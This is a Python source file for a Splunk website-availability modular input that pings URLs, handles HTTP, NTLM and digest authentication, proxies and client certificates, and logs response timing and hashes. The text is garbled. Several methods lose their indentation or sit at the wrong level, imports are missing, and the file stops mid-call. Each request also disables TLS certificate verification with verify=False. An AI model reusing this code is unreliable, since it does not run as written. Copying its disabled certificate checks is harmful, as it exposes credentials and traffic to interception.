from website_monitoring_app.expiring_dict import ExpiringDict
# Disable the SSL certificate warning
# http://lukemurphey.net/issues/1390
# We don't support SSL certificate checking at this point because I haven't found a good way to
# include the SSL cert libraries into a Splunk app.
from website_monitoring_app.requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class NTLMAuthenticationValueException(Exception):
    """
    Raised when the supplied NTLM authentication information is invalid
    (e.g. the username is not in the required DOMAIN\\user form).
    """
    pass
class Timer(object):
    """Context manager that measures the wall-clock duration of its body.

    After the with-block exits, `secs` holds the elapsed seconds and
    `msecs` the same duration in milliseconds.
    """

    def __init__(self, verbose=False):
        self.verbose = verbose

    def __enter__(self):
        self.start = time.time()
        return self

    def __exit__(self, *args):
        self.end = time.time()
        elapsed = self.end - self.start
        self.secs = elapsed
        self.msecs = elapsed * 1000  # millisecs
class WebPing(ModularInput):
    """
    The web ping modular input connects to a website to determine if the site is operational and
    tracks the time it takes to respond.
    """
    # Extracts the host portion from an HTTP/HTTPS URL
    PARSE_URL_RE = re.compile(r"http[s]?[:]//(.*)", re.IGNORECASE)
    # Supported HTTP authentication scheme identifiers
    HTTP_AUTH_BASIC = 'basic'
    HTTP_AUTH_DIGEST = 'digest'
    HTTP_AUTH_NTLM = 'ntlm'
    HTTP_AUTH_NEGOTIATE = 'negotiate'
    HTTP_AUTH_NONE = None
    # Upper bound on concurrently running ping threads
    DEFAULT_THREAD_LIMIT = 200
    # The following define which secure password entry to use for the proxy
    PROXY_PASSWORD_REALM = 'website_monitoring_app_proxy'
    PROXY_PASSWORD_USERNAME = 'IN_CONF_FILE'
    # This stores the default app config information
    default_app_config = None
class Result(object):
    """
    The results object designates the results of connecting to a website.
    """

    def __init__(self, request_time, response_code, timed_out, url, response_size=None,
                 response_md5=None, response_sha224=None, has_expected_string=None,
                 response_body=None, exceeded_redirects=None, return_body=False,
                 timeout=0, max_redirects=-1, warning_threshold=None, error_threshold=None,
                 headers=None):
        """Capture the outcome of a single web ping.

        request_time is the observed latency; timed_out and exceeded_redirects
        flag failure modes; the remaining fields mirror the HTTP response
        (size, hashes, body, headers) and the check's configured limits.
        """
        self.request_time = request_time
        self.response_code = response_code
        self.timed_out = timed_out
        self.url = url
        self.response_size = response_size
        self.response_md5 = response_md5
        self.response_sha224 = response_sha224
        self.has_expected_string = has_expected_string
        self.response_body = response_body
        self.exceeded_redirects = exceeded_redirects
        self.return_body = return_body
        self.timeout = timeout
        self.max_redirects = max_redirects
        self.warning_threshold = warning_threshold
        self.error_threshold = error_threshold
        self.headers = headers
def __init__(self, timeout=30, thread_limit=None):
    """Declare the modular-input scheme and its arguments.

    timeout is the default per-request timeout in seconds (falls back to 30
    for non-positive values); thread_limit caps concurrent checks and
    defaults to DEFAULT_THREAD_LIMIT.
    """
    scheme_args = {'title': "Website Availability Check",
                   'description': "Connects to a website in order to obtain performance statistics",
                   'use_external_validation': "true",
                   'streaming_mode': "xml",
                   'use_single_instance': "true"}
    args = [
        Field("title", "Title", "A short description (typically just the domain name)", empty_allowed=False),
        URLField("url", "URL", "The URL to connect to (must be be either HTTP or HTTPS protocol)", empty_allowed=False, require_https_on_cloud=True),
        DurationField("interval", "Interval", "The interval defining how often to perform the check; can include time units (e.g. 15m for 15 minutes, 8h for 8 hours)", empty_allowed=False),
        Field("configuration", "Configuration", "Defines a specific proxy configuration to use (in website_monitoring.spec) if not using the default; only used if you want to have multiple proxy servers", none_allowed=True, empty_allowed=True),
        Field("client_certificate", "Client Certificate Path", "Defines the path to the client certificate (if the website requires client SSL authentication)", none_allowed=True, empty_allowed=True),
        Field("client_certificate_key", "Client Certificate Key Path", "Defines the path to the client certificate key (necessary of the key is in a separate file from the certificate)", none_allowed=True, empty_allowed=True),
        Field("username", "Username", "The username to use for authenticating (only HTTP authentication supported)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        Field("password", "Password", "The password to use for authenticating (only HTTP authentication supported)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        Field("user_agent", "User Agent", "The user-agent to use when communicating with the server", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        Field("should_contain_string", "String match", "A string that should be present in the content", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        IntegerField("max_redirects", "Maximum Redirects", "The maximum number of redirects to follow (-1 or blank for unlimited, 0 to not follow any redirects)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        IntegerField("timeout", "Timeout", "The maximum number of seconds to wait for a response", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        BooleanField("return_body", "Return response body", "If checked, will return the response body", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        BooleanField("return_headers", "Return headers", "If checked, will return the response headers", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        IntegerField("warning_threshold", "Warning Threshold", "The number of milliseconds above which a response time is considered a 'Warning'", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
        IntegerField("error_threshold", "Error Threshold", "The number of milliseconds above which a response time is considered 'Failed'", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False)
    ]
    ModularInput.__init__(self, scheme_args, args, logger_name='web_availability_modular_input', logger_level=logging.INFO)
    # guard against non-positive timeouts from the caller
    if timeout > 0:
        self.timeout = timeout
    else:
        self.timeout = 30
    if thread_limit is None:
        self.thread_limit = WebPing.DEFAULT_THREAD_LIMIT
    else:
        self.thread_limit = thread_limit
    self.threads = {}
    # This will store a cache for proxy configs for 10 minutes
    self.app_configs = ExpiringDict(600)
@classmethod
def resolve_proxy_type(cls, proxy_type, logger=None):
    """
    Map a proxy-type string (e.g. "socks4") to the matching socks constant.

    Returns None for None, empty, or unrecognized input; an unrecognized
    value is additionally logged as a warning when a logger is provided.

    Argument:
    proxy_type -- A string representing the proxy type (e.g. "socks4")
    logger -- The logger object to use for logging
    """
    if proxy_type is None:
        return None
    # normalize so matching is whitespace- and case-insensitive
    normalized = proxy_type.strip().lower()
    known_types = {
        "socks4": socks.PROXY_TYPE_SOCKS4,
        "socks5": socks.PROXY_TYPE_SOCKS5,
        "http": socks.PROXY_TYPE_HTTP,
        "": None,
    }
    if normalized in known_types:
        return known_types[normalized]
    if logger:
        logger.warn("Proxy type is not recognized: %s", proxy_type)
    return None
@classmethod
def determine_auth_type(cls, url, proxies=None, timeout=None, cert=None, logger=None, ):
    """
    Determine the authentication type that is appropriate to authenticate to the given
    web-server, by probing the server's www-authenticate response header.

    Returns one of the HTTP_AUTH_* constants (lower-cased scheme name for
    schemes other than NTLM), or HTTP_AUTH_NONE when no header is present.

    Argument:
    url -- The url to connect to. This object ought to be an instance derived from using urlparse
    proxies -- The proxies to use
    timeout -- The amount of time to quit waiting on a connection
    cert -- A tuple representing the certificate to use
    logger -- The logger object to use for logging
    """
    # Perform a request to the URL and see what authentication method is required
    http = requests.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert,
                        verify=False)
    # Find the authentication header irrespective of case
    auth_header_value = None
    for header, value in http.headers.items():
        if header.lower() == 'www-authenticate':
            auth_header_value = value
            break
    # Determine if the authentication header is present and use it to determine the
    # authentication type
    if auth_header_value is not None:
        # Handle the pesky cases where a comma separated value is provided in the header
        # for NTLM negotiation (like "negotiate, ntlm")
        if 'ntlm' in auth_header_value.lower():
            return cls.HTTP_AUTH_NTLM
        # Otherwise, check the HTTP header for the authentication header
        m = re.search('^([a-zA-Z0-9]+)', auth_header_value)
        auth_type = m.group(1)
        return auth_type.lower()
    # No authentication header is present
    else:
        if logger:
            logger.warn("Unable to determine authentication type (no www-authenticate header); will default to basic authentication")
        return cls.HTTP_AUTH_NONE
@classmethod
def create_auth_for_request(cls, auth_type, username, password, logger=None):
    """
    Create the auth object for the requests library so that any HTTP authentication is taken care of.

    Falls back to a plain (username, password) tuple — requests' basic-auth
    shorthand — when the auth type is unrecognized.

    Argument:
    auth_type -- A string indicating the type of authentication require (e.g. "digest")
    username -- The username to use for authentication
    password -- The password to use for authentication
    logger -- The logger object to use for logging
    """
    # No authentication
    if auth_type == cls.HTTP_AUTH_NONE:
        return None
    # Digest authentication
    elif auth_type == cls.HTTP_AUTH_DIGEST:
        return requests.auth.HTTPDigestAuth(username, password)
    # NTLM authentication
    elif auth_type == cls.HTTP_AUTH_NTLM:
        try:
            return HttpNtlmAuth(username, password)
        except ValueError as e:
            # e.g. username missing the DOMAIN\ prefix
            raise NTLMAuthenticationValueException(e)
    # Basic authentication
    elif auth_type == cls.HTTP_AUTH_BASIC:
        return requests.auth.HTTPBasicAuth(username, password)
    # Unknown authentication type
    else:
        if logger:
            logger.warn('Unknown type of authentication requested, auth_type=%s', auth_type)
        return (username, password)
@classmethod
def isExceptionForTimeout(cls, exception):
"""
Determines if the given exception is due to a timeout
Argument:
exception -- The exception
"""
if exception.args is not None and len(exception.args) > 0 and hasattr(exception.args[0], 'reason') and hasattr(exception.args[0].reason, 'errno') and exception.args[0].reason.errno in [60, 61, 10060, 10061, 100]:
return True
else:
# Check the stacktrace to see if any of the exception indicate that the issue is a timeout
count = 0
while exception is not None and count < 10:
# Try to parse out the errno from the message since the errno is oftentimes
# unavailable in the exception chain
if re.match(".*((\[Errno ((51)|(60)|(61)|(10060)|(10061))\])|(timed out)).*", str(exception)):
return True
# See if the exception has a reason code indicating a connection failure
if hasattr(exception, 'errno') and exception.errno in [51, 60, 61, 10060, 10061, 110]:
return True
# Get the next exception
if hasattr(exception, 'args') and exception.args is not None and len(exception.args) > 0 and isinstance(exception.args[0], Exception):
exception = exception.args[0]
elif hasattr(exception, 'reason') and exception.reason is not None:
exception = exception.reason
else:
exception = None
count = count + 1
return False
    @classmethod
    def ping(cls, url, username=None, password=None, timeout=30, proxy_type=None,
             proxy_server=None, proxy_port=None, proxy_user=None, proxy_password=None, proxy_ignore=None,
             client_certificate=None, client_certificate_key=None, user_agent=None, max_redirects=None,
             logger=None, should_contain_string=None, response_body_length=0, raise_all=False,
             warning_threshold=None, error_threshold=None, return_headers=False, fips_mode=False):
        """
        Perform a ping to a website. Returns a WebPing.Result instance.

        Argument:
        url -- The url to connect to. This object ought to be an instance derived from using urlparse.
        username -- The username to use for authentication
        password -- The password to use for authentication
        timeout -- The amount of time to quit waiting on a connection.
        proxy_type -- The type of the proxy server (must be one of: socks4, socks5, http)
        proxy_server -- The proxy server to use.
        proxy_port -- The port on the proxy server to use.
        proxy_user -- The username for the proxy server.
        proxy_password -- The password for the proxy server.
        proxy_ignore -- The list of domains to not use the proxy server for.
        client_certificate -- The path to the client certificate to use.
        client_certificate_key -- The path to the client key to use.
        user_agent -- The string to use for the user-agent
        logger -- The logger object to use for logging
        should_contain_string -- A string that is expected in the response
        max_redirects -- The maximum number of redirects to follow
        response_body_length -- How much of the response body to return. -1 for unlimited, 0 to disable.
        raise_all -- Raise all exceptions even if it is for possibly recoverable issues.
        warning_threshold -- If the response time is above this number (in ms), it is considered a 'Warning'
        error_threshold -- If the response time is above this number (in ms), it is considered an 'Error' (Failed)
        return_headers -- If true, include the response headers in the output
        fips_mode -- If true, hash functions will be skipped that are not allowed on FIPS hosts (MD5)
        """
        if logger:
            logger.info('Performing ping, url="%s" timeout=%r', url.geturl(), timeout)
        # Disable the use of the proxy variables for the ignored domains
        if proxy_ignore is not None:
            os.environ['NO_PROXY'] = proxy_ignore
        if logger:
            logger.debug('Proxies discovered from the environment, proxies="%r"', getproxies())
        # Determine which type of proxy is to be used (if any)
        resolved_proxy_type = cls.resolve_proxy_type(proxy_type, logger=logger)
        # Set should_contain_string to none if it is blank since this means it really doesn't have
        # a value
        if should_contain_string is not None and len(should_contain_string.strip()) == 0:
            should_contain_string = None
        # Make sure that a timeout is not None since that is infinite
        if timeout is None:
            timeout = 30
        # Make sure that the max_redirects is None or >= 0 (None means unlimited)
        if max_redirects is not None and max_redirects < 0:
            max_redirects = None
        if logger and max_redirects is not None:
            logger.debug("max_redirects = %d", max_redirects)
        # Make sure that warning_threshold and error_threshold are positive or None
        if warning_threshold is not None and warning_threshold < 0:
            warning_threshold = None
        if error_threshold is not None and error_threshold < 0:
            error_threshold = None
        # Setup the proxy info if so configured
        proxies = {}
        if resolved_proxy_type is not None and proxy_server is not None and len(proxy_server.strip()) > 0:
            if proxy_type == "http":
                # Use the username and password if provided
                if proxy_password is not None and proxy_user is not None:
                    proxies = {
                        "http": "http://" + proxy_user + ":" + proxy_password + "@" + proxy_server + ":" + str(proxy_port),
                        "https": "http://" + proxy_user + ":" + proxy_password + "@" + proxy_server + ":" + str(proxy_port)
                    }
                else:
                    proxies = {
                        "http": "http://" + proxy_server + ":" + str(proxy_port),
                        "https": "http://" + proxy_server + ":" + str(proxy_port)
                    }
            else:
                # SOCKS proxy: NOTE(review) this monkey-patches socket.socket
                # process-wide, affecting all subsequent connections
                socks.setdefaultproxy(resolved_proxy_type, proxy_server, int(proxy_port))
                socket.socket = socks.socksocket
                if logger:
                    logger.debug("Using socks proxy server=%s, port=%s", proxy_server, proxy_port)
        else:
            # No proxy is being used
            pass
        # Setup the client certificate parameter
        if client_certificate is not None and client_certificate_key is not None:
            cert = (client_certificate, client_certificate_key)
        elif client_certificate is not None:
            cert = client_certificate
        else:
            cert = None
        if logger and cert is not None:
            logger.debug("Using client certificate %s", cert)
        # Defaults used when the request fails before a response is obtained
        request_time = 0
        response_code = 0
        response_md5 = None
        response_sha224 = None
        timed_out = False
        response_size = None
        has_expected_string = None
        response_body = None
        exceeded_redirects = None
        response_headers = None
        # Setup the headers as necessary
        headers = {}
        if user_agent is not None:
            if logger:
                logger.debug("Setting user-agent=%s", user_agent)
            headers['User-Agent'] = user_agent
        # Make an auth object if necessary
        auth = None
        auth_type = None
        if username is not None and password is not None:
            # Determine the auth type by probing the server
            try:
                auth_type = cls.determine_auth_type(url, proxies=proxies, timeout=timeout, cert=cert,
                                                    logger=logger)
            except Exception as e:
                auth_type = None
                if logger:
                    logger.exception("Unable to determine authentication type")
            # Don't allow the use of NTLM on a host in FIPS mode since NTLM uses MD4 which is a
            # weak algorithm
            if auth_type == cls.HTTP_AUTH_NTLM and fips_mode:
                if logger:
                    logger.warn("Authentication type was automatically identified but will not be used since it uses a weak hash algorithm which is not allowed on this host since it is running in FIPS mode; auth_type=%s", auth_type)
                auth_type = cls.HTTP_AUTH_NONE
            # The authentication type could not be determined. However, we know that
            # authentication is required since a username and password was provided.
            # Default to HTTP basic authentication.
            elif auth_type == cls.HTTP_AUTH_NONE:
                auth_type = cls.HTTP_AUTH_BASIC
                if logger:
                    logger.info("Authentication type could not be automatically discovered; auth_type=%s", auth_type)
            elif logger is not None:
                logger.debug("Discovered auth_type=%s", auth_type)
            # Get the authentication class for the request
            auth = cls.create_auth_for_request(auth_type, username, password, logger)
        try:
            # Perform the request, timing the round trip
            with Timer() as timer:
                # Make the client
                # http = requests.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert, verify=False, auth=auth, headers=headers)
                session = requests.Session()
                if max_redirects is not None:
                    session.max_redirects = max_redirects
                http = session.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert, verify=False, auth=auth, headers=headers)
                # Prep the content for hashing; we might need to convert it for Python 3
                if isinstance(http.text, binary_type):
                    http_text = http.text
                else:
                    http_text = http.text.encode('utf-8')
                # Get the hash of the content (MD5 is skipped on FIPS hosts; SHA-224 is FIPS-approved)
                if not fips_mode:
                    response_md5 = hashlib.md5(http_text).hexdigest()
                response_sha224 = hashlib.sha224(http_text).hexdigest()
                # Determine if the expected string is in the content
                if should_contain_string is not None:
                    has_expected_string = should_contain_string in http.text
                # Get the size of the content
                response_size = len(http.text)
                # Capture (a prefix of) the response body if requested
                if response_body_length < 0:
                    response_body = http.text
                elif response_body_length > 0:
                    response_body = http.text[:response_body_length]
            # timer.msecs is read after the context manager exits
            response_code = http.status_code
            request_time = timer.msecs
            # Get the headers
            if return_headers:
                response_headers = http.headers
        # Handle time outs
        except requests.exceptions.Timeout:
            # Note that the connection timed out
            timed_out = True
        except requests.exceptions.SSLError as e:
            if logger:
                logger.error("An SSL exception was thrown when executing a web request against url=%s: " + str(e), url.geturl())
        except requests.exceptions.ConnectionError as e:
            # A connection error may also indicate a timeout, depending on the chained errno
            timed_out = WebPing.isExceptionForTimeout(e)
            if not timed_out and logger:
                logger.exception("A connection exception was thrown when executing a web request against url=%s, this can happen if the domain name, IP address is invalid or if network connectivity is down or blocked by a firewall; see help_url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", url.geturl())
        except socks.GeneralProxyError:
            # This may be thrown if the user configured the proxy settings incorrectly
            if logger:
                logger.exception("An error occurred when attempting to communicate with the proxy for url=%s", url.geturl())
        except requests.exceptions.TooManyRedirects as e:
            exceeded_redirects = True
            if logger:
                logger.exception("The maximum number of redirects (%d) were exceeded for url=%s", max_redirects, url.geturl())
        except Exception as e:
            if raise_all:
                raise e
            if logger:
                logger.exception("A general exception was thrown when executing a web request for url=%s", url.geturl())
        # Finally, return the result (failures yield a Result with the defaults set above)
        return cls.Result(request_time, response_code, timed_out, url.geturl(), response_size, response_md5, response_sha224, has_expected_string, response_body, exceeded_redirects, timeout=timeout, max_redirects=max_redirects, warning_threshold=warning_threshold, error_threshold=error_threshold, headers=response_headers)
    def output_result(self, result, stanza, title, index=None, source=None, sourcetype=None,
                      host=None, unbroken=True, close=True, proxy_server=None, proxy_port=None,
                      proxy_user=None, proxy_type=None, out=sys.stdout):
        """
        Create and emit the event(s) representing a ping result.

        The response body (if captured) is emitted first as a separate event with
        sourcetype "<sourcetype>:response"; the field-based summary event follows.

        Argument:
        result -- A result instance from a call to WebPing.ping
        stanza -- The stanza used for the input
        title -- The human-readable title of the input
        sourcetype -- The sourcetype
        source -- The source field value
        index -- The index to send the event to
        host -- The host field value
        unbroken -- Passed through to the modular-input event writer
        close -- Passed through to the modular-input event writer
        proxy_server/proxy_port/proxy_user/proxy_type -- Proxy details to record on the event
        out -- The stream to send the event to (defaults to standard output)
        """
        # Zero response codes / request times indicate a failed request; emit blanks instead
        data = {
            'response_code': result.response_code if result.response_code > 0 else '',
            'total_time': round(result.request_time, 2) if result.request_time > 0 else '',
            'request_time': round(result.request_time, 2) if result.request_time > 0 else '',
            'timed_out': result.timed_out,
            'title': title,
            'url': result.url,
            'timeout': result.timeout
        }
        # Add the response headers if necessary
        if result.headers is not None:
            for header in result.headers:
                data['header_' + header] = result.headers[header]
        # Log proxy server information
        if proxy_server is not None:
            data['proxy_server'] = proxy_server
            data['proxy_type'] = proxy_type
            if proxy_user is not None and len(proxy_user) > 0:
                data['proxy_user'] = proxy_user
            if proxy_port is not None:
                data['proxy_port'] = proxy_port
        # Add the MD5 of the response if available
        if result.response_md5 is not None:
            data['content_md5'] = result.response_md5
        # Add the SHA-224 of the response if available
        if result.response_sha224 is not None:
            data['content_sha224'] = result.response_sha224
        # Add the size of the response if available
        if result.response_size is not None:
            data['content_size'] = result.response_size
        # Add the variable noting if the expected string was present
        if result.has_expected_string is not None:
            data['has_expected_string'] = str(result.has_expected_string).lower()
        # Add the variable noting if the maximum number of redirects was exceeded
        if result.exceeded_redirects is not None:
            data['exceeded_redirects'] = result.exceeded_redirects
        # Add the variable indicating what the maximum number of redirects allowed was
        if result.max_redirects is not None:
            data['max_redirects'] = result.max_redirects
        # Output the response body as a separate event, if present
        if result.response_body is not None:
            # Make the event
            event_dict = {'stanza': stanza,
                          'data' : result.response_body}
            if index is not None:
                event_dict['index'] = index
            if sourcetype is not None:
                event_dict['sourcetype'] = sourcetype + ":response"
            if source is not None:
                event_dict['source'] = source
            if host is not None:
                event_dict['host'] = host
            event = self._create_event(self.document,
                                       params=event_dict,
                                       stanza=stanza,
                                       unbroken=unbroken,
                                       close=close)
            out.write(self._print_event(self.document, event))
        # Add warning_threshold and/or error_threshold if not None
        if result.warning_threshold is not None:
            data['warning_threshold'] = result.warning_threshold
        if result.error_threshold is not None:
            data['error_threshold'] = result.error_threshold
        # Output event with fields
        return self.output_event(data, stanza, index=index, host=host, source=source,
                                 sourcetype=sourcetype, unbroken=unbroken, close=close, out=out)
    def save_checkpoint(self, checkpoint_dir, stanza, last_run):
        """
        Save the checkpoint state.

        Arguments:
        checkpoint_dir -- The directory where checkpoints ought to be saved
        stanza -- The stanza of the input being used
        last_run -- The time when the analysis was last performed
        """
        # Delegate to the modular-input base class helper; only the last run time is persisted
        self.save_checkpoint_data(checkpoint_dir, stanza, {'last_run' : last_run})
    @forgive_splunkd_outages
    def get_app_config(self, session_key, stanza="default"):
        """
        Get the app configuration (proxy settings, thread limit, response body limit).

        Results are cached per-stanza in self.app_configs. Note that even when the
        REST lookup fails with ResourceNotFound, the defaults assembled below are
        cached and returned.

        Arguments:
        session_key -- The session key to use when connecting to the REST API
        stanza -- The stanza to get the app configuration from (defaults to "default")
        """
        # See if it is in the cache
        try:
            website_monitoring_config = self.app_configs[stanza]
            if website_monitoring_config is not None:
                return website_monitoring_config
        except KeyError:
            # entry was not found, continue
            pass
        # If the stanza is empty, then just use the default
        if stanza is None or stanza.strip() == "":
            stanza = "default"
        # Start off with a default list of settings
        website_monitoring_config = {
            'proxy_type' : 'http',
            'proxy_server' : '',
            'proxy_port' : '',
            'proxy_user': '',
            'proxy_password' : '',
            'thread_limit' : 200,
            'proxy_ignore' : None,
            'max_response_body_length' : 1000
        }
        # Get the configuration from the REST endpoint and overlay it on the defaults
        try:
            server_response, server_content = splunk.rest.simpleRequest('/servicesNS/nobody/website_monitoring/admin/website_monitoring/' + stanza + '?output_mode=json', sessionKey=session_key)
            if server_response['status'] != '200':
                raise Exception("Could not get the website_monitoring configuration")
            app_content = json.loads(server_content)
            self.logger.debug("Loaded config is %r", app_content)
            website_monitoring_config.update(app_content['entry'][0]['content'])
            # Convert the thread limit to an integer
            try:
                website_monitoring_config['thread_limit'] = int(website_monitoring_config['thread_limit'])
            except ValueError:
                # Use a value of 25 on Splunk Cloud
                if self.is_on_cloud(session_key):
                    self.logger.error("The value for the thread limit is invalid and will be ignored (will use a limit of 25), value=%s", website_monitoring_config['thread_limit'])
                    website_monitoring_config['thread_limit'] = 25
                else:
                    self.logger.error("The value for the thread limit is invalid and will be ignored (will use a limit of 200), value=%s", website_monitoring_config['thread_limit'])
                    website_monitoring_config['thread_limit'] = 200
            # Convert the max_response_body_length to an integer
            try:
                website_monitoring_config['max_response_body_length'] = int(website_monitoring_config['max_response_body_length'])
            except ValueError:
                self.logger.error("The value for the maximum response body length is invalid and will be ignored (will use a limit of 1000), value=%s", website_monitoring_config['max_response_body_length'])
                website_monitoring_config['max_response_body_length'] = 1000
            self.logger.debug("App config information loaded, stanza=%s", stanza)
        except splunk.ResourceNotFound:
            # Fall through and cache/return the defaults
            self.logger.info('Unable to find the app configuration for the specified configuration stanza=%s, error="not found"', stanza)
        except splunk.SplunkdConnectionException:
            # Re-raised so that @forgive_splunkd_outages can retry
            self.logger.error('Unable to find the app configuration for the specified configuration stanza=%s error="splunkd connection error", see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting', stanza)
            raise
        # Add the entry to the cache
        self.app_configs[stanza] = website_monitoring_config
        return website_monitoring_config
    @forgive_splunkd_outages
    def get_proxy_config(self, session_key, stanza="default"):
        """
        Get the proxy configuration.

        This returns the following in a 6-tuple:
        # proxy type
        # proxy server
        # proxy port
        # proxy user
        # proxy password
        # proxy ignore list

        Arguments:
        session_key -- The session key to use when connecting to the REST API
        stanza -- The stanza to get the proxy information from (defaults to "default")
        """
        # Don't allow the use of a proxy server on Splunk Cloud since this could
        # allow unencrypted communication. Cloud shouldn't need the use of a proxy anyways.
        # Some do use the app to test proxies but they should use an on-prem forwarder
        # instead.
        if self.is_on_cloud(session_key):
            return "http", None, None, None, None, None
        # If the stanza is empty, then just use the default
        if stanza is None or stanza.strip() == "":
            stanza = "default"
        # Get the proxy configuration
        website_monitoring_config = self.get_app_config(session_key, stanza)
        # Get the proxy password from secure storage (if it exists); it takes
        # precedence over the clear-text value in the app configuration
        secure_password = get_secure_password(realm=WebPing.PROXY_PASSWORD_REALM,
                                              username=WebPing.PROXY_PASSWORD_USERNAME,
                                              session_key=session_key)
        if secure_password is not None:
            proxy_password = secure_password['content']['clear_password']
            self.logger.debug("Loaded the proxy password from secure storage")
        elif website_monitoring_config is not None:
            proxy_password = website_monitoring_config['proxy_password']
        else:
            proxy_password = None
        if website_monitoring_config is not None:
            return website_monitoring_config['proxy_type'], website_monitoring_config['proxy_server'], \
                   website_monitoring_config['proxy_port'], website_monitoring_config['proxy_user'], \
                   proxy_password, website_monitoring_config['proxy_ignore']
        else:
            return 'http', '', '', '', proxy_password, None
def cleanup_threads(self, threads):
# Keep track of the number of removed threads so that we can make sure to emit a log
# message noting the number of threads
removed_threads = 0
# Clean up old threads
for thread_stanza in list(threads):
# If the thread isn't alive, prune it
if not threads[thread_stanza].isAlive():
removed_threads = removed_threads + 1
self.logger.debug("Removing inactive thread for stanza=%s, thread_count=%i", thread_stanza, len(threads))
del threads[thread_stanza]
# If we removed threads, note the updated count in the logs so that it can be tracked
if removed_threads > 0:
self.logger.info("Removed inactive threads, thread_count=%i, removed_thread_count=%i", len(threads), removed_threads)
return removed_threads
    def run(self, stanza, cleaned_params, input_config):
        """
        Execute one scheduled pass for a single input stanza: validate parameters,
        load the thread limit once, and (if due) run the ping either inline or on
        a dedicated worker thread.
        """
        # Make the parameters
        interval = cleaned_params.get("interval", None)
        title = cleaned_params.get("title", None)
        url = cleaned_params.get("url", None)
        client_certificate = cleaned_params.get("client_certificate", None)
        client_certificate_key = cleaned_params.get("client_certificate_key", None)
        username = cleaned_params.get("username", None)
        password = cleaned_params.get("password", None)
        timeout = cleaned_params.get("timeout", self.timeout)
        sourcetype = cleaned_params.get("sourcetype", "web_ping")
        host = cleaned_params.get("host", None)
        index = cleaned_params.get("index", "default")
        conf_stanza = cleaned_params.get("configuration", None)
        user_agent = cleaned_params.get("user_agent", None)
        should_contain_string = cleaned_params.get("should_contain_string", None)
        max_redirects = cleaned_params.get("max_redirects", -1)
        return_body = cleaned_params.get("return_body", False)
        return_headers = cleaned_params.get("return_headers", False)
        warning_threshold = cleaned_params.get("warning_threshold", None)
        error_threshold = cleaned_params.get("error_threshold", None)
        source = stanza
        self.logger.debug("cleaned_params=%r", cleaned_params)
        # Check for missing parameters
        if interval is None:
            self.logger.error("Required parameter '%s' is missing for stanza=%s", "interval", stanza)
            return
        if title is None:
            self.logger.error("Required parameter '%s' is missing for stanza=%s", "title", stanza)
            return
        if url is None:
            self.logger.error("Required parameter '%s' is missing for stanza=%s", "url", stanza)
            return
        # Load the thread_limit if necessary
        # This should only be necessary once in the processes lifetime
        if self.default_app_config is None:
            # Get the default app config
            self.default_app_config = self.get_app_config(input_config.session_key)
            self.logger.debug("Default config is %r", self.default_app_config)
            # Get the limit from the app config
            try:
                loaded_thread_limit = int(self.default_app_config['thread_limit'])
            except ValueError:
                loaded_thread_limit = None
            # Ensure that the thread limit is valid
            # If it is valid and we are not on cloud, then just load it
            # Or: if it is valid even for cloud, then load it
            if (loaded_thread_limit is not None and loaded_thread_limit > 0 and not self.is_on_cloud(input_config.session_key)) \
                or (loaded_thread_limit is not None and loaded_thread_limit <= 25 and self.is_on_cloud(input_config.session_key)):
                self.thread_limit = loaded_thread_limit
                self.logger.debug("Thread limit successfully loaded, thread_limit=%r",
                                  loaded_thread_limit)
            # If it is valid but too high and we are on cloud, then just set it to 25
            elif loaded_thread_limit is not None and loaded_thread_limit > 25 and self.is_on_cloud(input_config.session_key):
                self.thread_limit = 25
                self.logger.warn("Thread limit is too high for Splunk Cloud as it must be no greater than 25; it will be set to 25, thread_limit=%r",
                                 loaded_thread_limit)
            # Warn that the thread limit is invalid
            else:
                self.logger.warn("The thread limit is invalid and will be ignored, thread_limit=%r", loaded_thread_limit)
                # Default to 25 if on cloud
                if self.is_on_cloud(input_config.session_key):
                    self.thread_limit = 25
        # Clean up old threads
        self.cleanup_threads(self.threads)
        # Stop if we have a running thread
        if stanza in self.threads:
            self.logger.debug("No need to execute this stanza since a thread already running for stanza=%s", stanza)
        # Determines if the input needs another run
        elif self.needs_another_run(input_config.checkpoint_dir, stanza, interval):
            # Get the secure password if necessary; it overrides the clear-text one
            if username is not None:
                secure_password = get_secure_password(realm=stanza, session_key=input_config.session_key)
                if secure_password is not None:
                    password = secure_password['content']['clear_password']
                    self.logger.debug("Successfully loaded the secure password for input=%s", stanza)
            # Worker closure; runs either inline or on a thread depending on thread_limit
            def run_ping():
                # Get the proxy configuration
                try:
                    proxy_type, proxy_server, proxy_port, proxy_user, proxy_password, proxy_ignore = \
                        self.get_proxy_config(input_config.session_key, conf_stanza)
                except splunk.ResourceNotFound:
                    self.logger.error("The proxy configuration could not be loaded (was not found). The execution will be skipped for this input with stanza=%s", stanza)
                    return
                except splunk.SplunkdConnectionException:
                    self.logger.error("The proxy configuration could not be loaded (Splunkd connection exception). The execution will be skipped for this input with stanza=%s, see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", stanza)
                    return
                except:
                    self.logger.exception("Exception generated when attempting to get the proxy configuration stanza=%s, see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", stanza)
                    return
                # Set the max response body length for this request
                response_body_length = self.default_app_config['max_response_body_length']
                if return_body is False:
                    response_body_length = 0
                # Perform the ping
                try:
                    result = WebPing.ping(url, username, password, timeout, proxy_type,
                                          proxy_server, proxy_port, proxy_user, proxy_password,
                                          proxy_ignore, client_certificate, client_certificate_key, user_agent, max_redirects,
                                          logger=self.logger, should_contain_string=should_contain_string,
                                          response_body_length=response_body_length, warning_threshold=warning_threshold,
